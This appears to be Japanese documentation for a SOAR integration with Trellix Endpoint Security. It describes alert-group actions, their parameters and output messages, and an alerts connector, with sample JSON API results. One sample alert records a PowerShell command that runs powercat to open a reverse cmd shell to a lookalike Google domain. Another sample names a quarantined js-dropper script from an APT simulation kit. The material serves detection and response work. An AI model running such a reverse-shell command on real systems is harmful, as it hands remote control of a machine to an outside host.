"regKeyEvent/valueType": "REG_SZ",
"regKeyEvent/value": "QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAAAA=",
"regKeyEvent/text": "C:\\Windows\\System32\\cmd.exe",
"regKeyEvent/username": "FIREEYE-LAB\\Administrator"
},
"is_false_positive": false
},
"generic_alert_badge": null,
"generic_alert_label": null,
"stats": {
"events": 2
},
"url": "/hx/api/v3/alert_groups/e9f4d7baaa362d9d5d0b6e053ba0d44d",
"created_at": "2020-12-10T08:04:54.740Z",
"acknowledgement": {
"acknowledged": true,
"acknowledged_by": "test2",
"acknowledged_time": "2020-12-22T19:00:25.688Z",
"comment": "test comment",
"comment_update_time": "2020-12-22T19:00:25.688Z"
},
"grouped_by": {
"condition_id": "2npvcLf_arxPaH717hQZ9g==",
"detected_by": "ioc_engine",
"host": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"hostname": "HW-HOST-FY01",
"primary_ip_address": "172.30.202.152"
}
}
}
]
},
"message": "OK",
"details": [],
"route": "/hx/api/v3/alert_groups"
}
Case Wall
| 結果のタイプ | 値 / 説明 | 種類 |
|---|---|---|
| 出力メッセージ * | アクションが失敗したり、ハンドブックの実行が停止したりすることはありません。 「Successfully updated acknowledgement status for all alert groups」 一部が成功し、一部が失敗した場合(指定された ID の数が合計よりも多い)- 「次のアラート グループ ID のアラートが正常に取得されました: {succesfull_alert_groups_ids}」 アラート グループの詳細が取得されなかった場合: 「指定されたアラート グループ ID のアラートを取得できませんでした。提供された ID を確認して、もう一度お試しください。」 アクションが失敗し、ハンドブックの実行が停止します: |
全般 |
ホスト アラート グループを取得する
説明
Trellix Endpoint Security のホストに関連するアラート グループを一覧表示します。サポートされるエンティティ: ホスト名、IP アドレス。
パラメータ
| パラメータの表示名 | 種類 | デフォルト値 | 必須 | 説明 |
|---|---|---|---|---|
| 確認フィルタ | DDL | すべて 確認済みのみ 未確認のみ |
いいえ | すべてのアラート グループを返すか、確認済み/未確認のアラート グループのみを返すかを指定します。 |
| 返されるアラート グループの最大数 | Integer | 20 | いいえ | エンティティごとに返されるアラート グループの数を指定します。デフォルト: 20。 |
実行
このアクションは次のエンティティに対して実行されます。
- IP アドレス
- ホスト名
アクションの結果
スクリプトの結果
| スクリプトの結果名 | 値のオプション | 例 |
|---|---|---|
| is_success | True/False | is_success:False |
JSON の結果
{
"_id": "6d9a68f2a78f8d983bd3c0f4556785e6",
"assessment": "[Heur.BZC.ONG.Cheetah.3.1C89233F]",
"file_full_path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
"first_event_at": "2021-07-01T09:44:18.809Z",
"last_event_at": "2021-07-01T09:44:18.809Z",
"dispositions": [],
"source": "MAL",
"has_fp_disposition": false,
"last_alert": {
"_id": 812,
"agent": {
"_id": "JS2asEbMWGgfxT0aHVu034",
"url": "/hx/api/v3/hosts/JS2asEbMWGgfxT0aHVu034",
"hostname": "FireEye-Domain",
"containment_state": "normal"
},
"event_at": "2021-07-01T09:44:18.809+00:00",
"matched_at": "2021-07-01T09:44:18.809+00:00",
"reported_at": "2021-07-01T09:44:20.353+00:00",
"source": "MAL",
"resolution": "QUARANTINED",
"decorators": [],
"md5values": [
"36be03ea88f7d1effcafeeb65e0e1e57"
],
"decorator_sources": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/812",
"condition": null,
"event_id": null,
"event_type": null,
"event_values": {
"system-data": {
"xmlns": "http://www.fireeye.com/antimalware-alert",
"xmlns:xsi": "http://www.w3.org/2001/XMLSchema-instance",
"xsi:schemaLocation": "http://www.fireeye.com/antimalware-alert AM-alert.xsd",
"alert-version": "3",
"correlation-id": "d01e8ea6-4d34-4005-8482-3ccc026e11ea",
"timestamp": "2021-07-01T09:44:18.809Z",
"product-version": "32.36.0",
"engine-version": "11.0.1.19",
"content-version": "7.86346",
"mg-engine-version": "32.30.0.8460",
"mg-content-version": "25",
"whitelist-schema-version": "1.0.0",
"whitelist-content-version": "1.32.1"
},
"os-details": {
"$": {
"name": "windows",
"version": "10.0.14393",
"patch": "0",
"os-arch": "64-bit",
"os-language": "en-US"
}
},
"scan-type": "oas",
"scanned-object": {
"scanned-object-type": "file-event",
"file-event": {
"file-path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
"actor-process": {
"pid": "1268",
"path": "C:\\Windows\\System32\\xcopy.exe",
"user": {
"username": "",
"domain": ""
}
},
"sub-type": "FILE_OPERATION_CLOSED"
}
},
"detections": {
"detection": [
{
"engine": {
"engine-type": "av",
"engine-version": "11.0.1.19",
"content-version": "7.86346"
},
"infected-object": {
"object-type": "file",
"file-object": {
"file-path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
"inner-file-path": "",
"original-file-name": "",
"container": "false",
"packed": "false",
"hidden": "false",
"system-file": "false",
"read-only": "false",
"temporary": "false",
"md5sum": "36be03ea88f7d1effcafeeb65e0e1e57",
"sha1sum": "ce1cdd84732367cbf2be60df57c52760bf2e8fe9",
"sha256sum": "3862ddf0a77ef8e7e17c641939a6dc349885c1a08cd64748ec50358adafe0631",
"size-in-bytes": "753",
"creation-time": "2021-07-01T09:41:47.610Z",
"modification-time": "2020-05-29T09:34:17.066Z",
"access-time": "2021-07-01T09:41:47.610Z"
}
},
"infection": {
"confidence-level": "high",
"infection-type": "malware",
"infection-name": "Heur.BZC.ONG.Cheetah.3.1C89233F"
},
"action": {
"actioned-object": {
"object-type": "file",
"file-object": {
"file-path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
"inner-file-path": "",
"original-file-name": "",
"container": "false",
"packed": "false",
"hidden": "false",
"system-file": "false",
"read-only": "false",
"temporary": "false",
"md5sum": "36be03ea88f7d1effcafeeb65e0e1e57",
"sha1sum": "ce1cdd84732367cbf2be60df57c52760bf2e8fe9",
"sha256sum": "3862ddf0a77ef8e7e17c641939a6dc349885c1a08cd64748ec50358adafe0631",
"size-in-bytes": "753",
"creation-time": "2021-07-01T09:41:47.610Z",
"modification-time": "2020-05-29T09:34:17.066Z",
"access-time": "2021-07-01T09:41:47.610Z"
}
},
"requested-action": "clean",
"applied-action": "quarantine",
"result": "success",
"error": "0",
"reboot-required": "false"
}
}
]
},
"scan-statistics": {
"total-scan-time-in-ms": "12227"
}
},
"is_false_positive": false
},
"generic_alert_badge": null,
"generic_alert_label": null,
"stats": {
"events": 1
},
"url": "/hx/api/v3/alert_groups/6d9a68f2a78f8d983bd3c0f4556785e6",
"created_at": "2021-07-01T09:44:23.726Z",
"acknowledgement": {
"acknowledged": false,
"acknowledged_by": null,
"acknowledged_time": null,
"comment": null,
"comment_update_time": null
},
"grouped_by": {
"md5sum": "36be03ea88f7d1effcafeeb65e0e1e57",
"file-path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
"infection-name": "Heur.BZC.ONG.Cheetah.3.1C89233F",
"detected_by": "malware_file_access_scan",
"host": {
"_id": "JS2asEbMWGgfxT0aHVu034",
"url": "/hx/api/v3/hosts/JS2asEbMWGgfxT0aHVu034",
"hostname": "FireEye-Domain",
"primary_ip_address": "172.30.202.71"
}
}
},
{
"_id": "0043aa34dea99c23996c2f16291cdb4e",
"assessment": "[Process powershell.exe started] POWERCAT (UTILITY)",
"file_full_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"first_event_at": "2021-07-01T09:41:50.428Z",
"last_event_at": "2021-07-01T09:41:50.428Z",
"dispositions": [],
"source": "IOC",
"has_fp_disposition": false,
"last_alert": {
"_id": 811,
"agent": {
"_id": "JS2asEbMWGgfxT0aHVu034",
"url": "/hx/api/v3/hosts/JS2asEbMWGgfxT0aHVu034",
"hostname": "FireEye-Domain",
"containment_state": "normal"
},
"condition": {
"_id": "KBvTAC_L_GiI9BZbph2GoA==",
"url": "/hx/api/v3/conditions/KBvTAC_L_GiI9BZbph2GoA=="
},
"event_at": "2021-07-01T09:41:50.428+00:00",
"matched_at": "2021-07-01T09:43:29+00:00",
"reported_at": "2021-07-01T09:44:09.339+00:00",
"source": "IOC",
"resolution": "ALERT",
"decorators": [],
"md5values": [
"097ce5761c89434367598b34fe32893b"
],
"decorator_sources": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/811",
"event_id": 11311494,
"event_type": "processEvent",
"event_values": {
"processEvent/timestamp": "2021-07-01T09:41:50.428Z",
"processEvent/eventType": "start",
"processEvent/pid": 3676,
"processEvent/processPath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"processEvent/process": "powershell.exe",
"processEvent/parentPid": 2496,
"processEvent/parentProcessPath": "C:\\Windows\\System32\\cmd.exe",
"processEvent/parentProcess": "cmd.exe",
"processEvent/username": "FIREEYE-LAB\\Administrator",
"processEvent/startTime": "2021-07-01T09:41:50.428Z",
"processEvent/md5": "097ce5761c89434367598b34fe32893b",
"processEvent/processCmdLine": "powershell -Exec Bypass \". \\\"C:\\TMP\\nc.ps1\\\";powercat -c www.googleaccountsservices.com -p 80 -t 2 -e cmd\""
},
"multiple_match": "Multiple Indicators Matched.",
"is_false_positive": false
},
"generic_alert_badge": null,
"generic_alert_label": null,
"stats": {
"events": 1
},
"url": "/hx/api/v3/alert_groups/0043aa34dea99c23996c2f16291cdb4e",
"created_at": "2021-07-01T09:44:13.744Z",
"acknowledgement": {
"acknowledged": false,
"acknowledged_by": null,
"acknowledged_time": null,
"comment": null,
"comment_update_time": null
},
"grouped_by": {
"condition_id": "KBvTAC_L_GiI9BZbph2GoA==",
"detected_by": "ioc_engine",
"host": {
"_id": "JS2asEbMWGgfxT0aHVu034",
"url": "/hx/api/v3/hosts/JS2asEbMWGgfxT0aHVu034",
"hostname": "FireEye-Domain",
"primary_ip_address": "172.30.202.71"
}
}
Case Wall
| 結果のタイプ | 値 / 説明 | タイプ |
|---|---|---|
| 出力メッセージ \* | アクションが失敗したり、ハンドブックの実行が停止したりすることはありません。 1 つのエンティティにデータが利用できない場合(is_success = true): 「アクションは、Trellix Endpoint Security で次のエンティティのアラート グループを取得できませんでした: {entity.identifier}」 すべてのエンティティでデータが利用可能でない場合(is_success=false): 「Trellix Endpoint Security で指定されたエンティティのアラート グループが見つかりませんでした。」 アクションが失敗し、ハンドブックの実行が停止します: |
一般 |
| Case Wall テーブル | 列:
|
エンティティ |
コネクタ
FireEye HX Alerts コネクタ
説明
Google SecOps SOAR Trellix Endpoint Security Alerts Connector は、Trellix Endpoint Security サーバーで生成されたアラートを取り込みます。
Connector は、Trellix Endpoint Security API サーバー エンドポイントに定期的に接続し、特定の期間に生成されたアラートのリストを取得します。新しいアラートが存在する場合、コネクタは Trellix Endpoint Security アラートに基づいて Google SecOps SOAR アラートを作成し、コネクタのタイムスタンプを最後に正常に取り込まれたアラートの時刻として保存します。次のコネクタ実行では、コネクタはタイムスタンプ(コネクタが「スタック」しないように、タイムスタンプに「技術的な」オフセットを加えたもの)から作成されたアラートのみを Trellix Endpoint Security API にクエリします。新しいアラートが見つからない場合は、現在の実行を終了します。
API 権限
Trellix Endpoint Security Alerts Connector は、既存の FireEye 統合と同じ API 認証方法と権限を使用します。FireEye アラートを操作するには、統合に使用するアカウントに「API アナリスト」または「API 管理者」のロールが必要です。
Google SecOps で FireEye HX アラート コネクタを構成する
Google SecOps でコネクタを構成する方法の詳細については、コネクタの構成をご覧ください。
コネクタ パラメータ
次のパラメータを使用してコネクタを構成します。
| パラメータの表示名 | 種類 | デフォルト値 | 必須 | 説明 |
|---|---|---|---|---|
| プロダクト フィールド名 | 文字列 | ProductName | はい | プラットフォームで定義された説明。フィールドは不変です。 |
| イベント フィールド名 | 文字列 | AlertName | はい | プラットフォームで定義された説明。フィールドは不変です。 |
| 環境フィールド名 | 文字列 | "" | いいえ | 環境名が格納されるフィールドの名前を記述します。 環境フィールドが見つからない場合、環境は " " です。 |
| 環境の正規表現パターン | 文字列 | .* | いいえ | [環境フィールド名] フィールドで見つかった値に対して実行する正規表現パターン。 デフォルトは、すべてキャッチして値を変更せずに返す .* です。 ユーザーが正規表現ロジックで環境フィールドを操作できるようにするために使用されます 正規表現パターンが null か空の場合、または環境値が null の場合、最終的な環境の結果は "" になります。 |
| スクリプトのタイムアウト(秒) | 整数 | 180 | はい | 現在のスクリプトを実行している Python プロセスのタイムアウト上限。 |
| API ルート | 文字列 | https://x.x.x.x:<port> | はい | Trellix Endpoint Security Server API ルート URL |
| ユーザー名 | 文字列 | なし | はい | 認証に使用する Trellix Endpoint Security ユーザー |
| パスワード | パスワード | なし | はい | 認証に使用する Trellix Endpoint Security ユーザーのパスワード |
| SSL を確認する | チェックボックス | オン | はい | 指定されている場合、コネクタは Trellix Endpoint Security が有効な SSL 証明書で構成されているかどうかを確認します。証明書が無効な場合、コネクタはエラーを返します。 |
| オフセット時間(時間) | 整数 | 24 | ○ | X 時間前から遡ってアラートを取得します。 |
| 1 サイクルあたりのアラートの最大数 | Integer | 25 | はい | 1 回のコネクタ実行で処理するアラートの数。 |
| アラートの種類 | 文字列 | active_threat | いいえ | 取り込む Trellix Endpoint Security アラートのタイプを指定します。デフォルトでは active_threat に設定されており、ALERT 状態と QUARANTINED/partial_block 状態のアラートが返されます。有効なパラメータは ALERT で、オープン アラートのみを返します。 |
| 許可リストを拒否リストとして使用 | チェックボックス(checkbox) | オフ | ○ | 有効にすると、許可リストが拒否リストとして使用されます。 |
| プロキシ サーバーのアドレス | IP_OR_HOST | なし | いいえ | 接続に使用するプロキシ サーバー。 |
| プロキシ サーバーのユーザー名 | 文字列 | なし | いいえ | プロキシ サーバーのユーザー名。 |
| プロキシ サーバーのパスワード | パスワード | なし | いいえ | プロキシ サーバーのパスワード。 |
コネクタ ルール
- ブラックリスト ブラックリスト ルールはサポートされている必要がありますが、コネクタはデフォルトでホワイトリスト ロジックを使用します。
- ホワイトリスト登録ルール: デフォルトで使用されます。
- プロキシのサポート: コネクタはプロキシをサポートしています。
- デフォルトの ConnectorRules
| RuleType(Whitelist \ Blacklist) | RuleName(文字列) |
|---|---|
| WhiteList | このセクションでは、アラートのソースとサブタイプ属性に基づいて取り込むアラートを指定します。たとえば、インジケーター アラートの場合は「IOC」、サブタイプが「AV」のマルウェア アラートのみを取り込む場合は「MAL AV」、サブタイプに関係なくすべてのマルウェア アラートを取り込む場合は「MAL」と指定します。すべてのアラートを取り込むには、ホワイトリスト セクションからすべてを削除します。 |
さらにサポートが必要な場合 コミュニティ メンバーや Google SecOps のプロフェッショナルから回答を得ることができます。